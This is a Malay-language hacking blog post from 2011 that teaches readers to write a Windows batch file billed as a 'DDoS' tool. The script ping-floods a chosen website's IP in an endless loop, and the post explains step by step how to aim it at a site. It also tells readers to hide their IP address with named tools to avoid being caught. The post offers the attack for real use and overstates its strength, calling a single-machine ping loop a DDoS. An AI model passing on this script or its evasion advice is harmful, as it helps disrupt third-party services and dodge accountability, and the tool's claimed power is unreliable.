Thursday, 1 December 2011

DDoS Attack With Simple DDoS Tool










Assalamualaikum semua....hari ini aku nak ajar cara nak DDoS.Sekarang nih dah bnyak tools untuk DDoS nih.Contohnya seperti LOIC,HOIC,Server Attacker dll....tapi hari ini kita akan DDoS menggunakan tool yg simple.Tool ni korang kene buat seniri.hehe... xD


Oh sebelum terlupa anda perlu menyembunyikan IP ADDRESS anda terlebih dahulu.atau anda akan ditangkap.anda boleh menggunakan apa2 tools sekali pun seperti Platinum IP Hide atau tool lain.

Download : Platinum Hide IP



Baiklah tool simple ni sebenarnya korang bole buat hanya dngan menggunakan notepad sahaja.Betul tu...NOTEPAD!ok jom mula...

LANGKAH 1 :

Copy code2 dibawah ini :



@echo off
mode 67,16
title DDOS Attack
color 0a
cls
echo.
echo DDOS With Batchfile
echo.
set /p x=Server-Target:
echo.
ping %x%
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo.
echo.
set /p m=ip Host:
echo.
set /p n=Packet Size:
echo.
:DDOS
color 0c
echo Attacking Server %m%
ping %m% -i %n% -t >nul
goto DDOS



LANGKAH 2 :


Buka application notepad,paste-kan code2 tadi.

LANGKAH 3 :

Save file anda seperti dibawah : 



File Name : DDoS Attack.bat  
Save As Type : All File <--- PENTING

note: file name tu 
nak letak nama lain pun bole.pastikan format .bat


OK SIAP!!

Cara-cara menggunakannya :

1. Double click file anda itu.

2. Akan tertera : Server-Target:



Masukkan alamat/url website anda.pastikan tidak ada http:// di depan dan / di belakang url.

Contoh :
Sebelum              = http://www.google.com/
Tukarkan kepada = www.google.com
 

Setelah memasukkan url itu, tekan enter.




3. Selepas itu, website itu akan di-ping untuk mendapatkan ip address.Anda memerlukan IP Address itu.
Setelah selesai ping, akan keluar seperti ini :


Pinging www.l.google.com [209.85.175.106] with 32 bytes of data:
Reply from 209.85.175.106: bytes=32 time=30ms TTL=56
Reply from 209.85.175.106: bytes=32 time=40ms TTL=55
Reply from 209.85.175.106: bytes=32 time=24ms TTL=56
Reply from 209.85.175.106: bytes=32 time=36ms TTL=56

Ping statistics for 209.85.175.106:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 24ms, Maximum = 40ms, Average = 32ms


209.85.175.106 <----- IP address bagi www.google.com
Caranya sama jugak untuk website lain.




4. Selepas itu, akan terpapar di tool itu :  ip Host:


Masukkan saja ip address yg anda dapat tadi.
Contoh :

ip Host:209.85.175.106

dan tekan enter.



5. Akhir sekali akan keluar pula :  Packet Size :

Letakkan berapa bnyak yg anda mahu.lagi banyak lagi POWER!lol

Contoh :

Packet Size : 10000000

Dan tekan enter.

6. Akan terpapar : Attacking Server.....
Itu bermakna tool itu sedang menjalankan tugasnya(DDoS).







nice right?? :D



Note: DDoS attack hanya berkesan jika diserang oleh banyak server.mean bnyak org attack lah...kalau sorang je yg attack baik tutup jer lappy/pc korang tu dan masuk tidur... :-P


Baiklah....sampai sini sahaja untuk tuto kali ini....lain hari aku akan ajar cara2 menggunakan LOIC pulak.Assalamualaikum.....
Item Reviewed: DDoS Attack With Simple DDoS Tool Description: Rating: 5 Reviewed By Afif Zafri

Share:

Popular Posts

© 2011 - Reaperz All rights reserved | Theme Designed by Seo Blogger Templates DMCA.com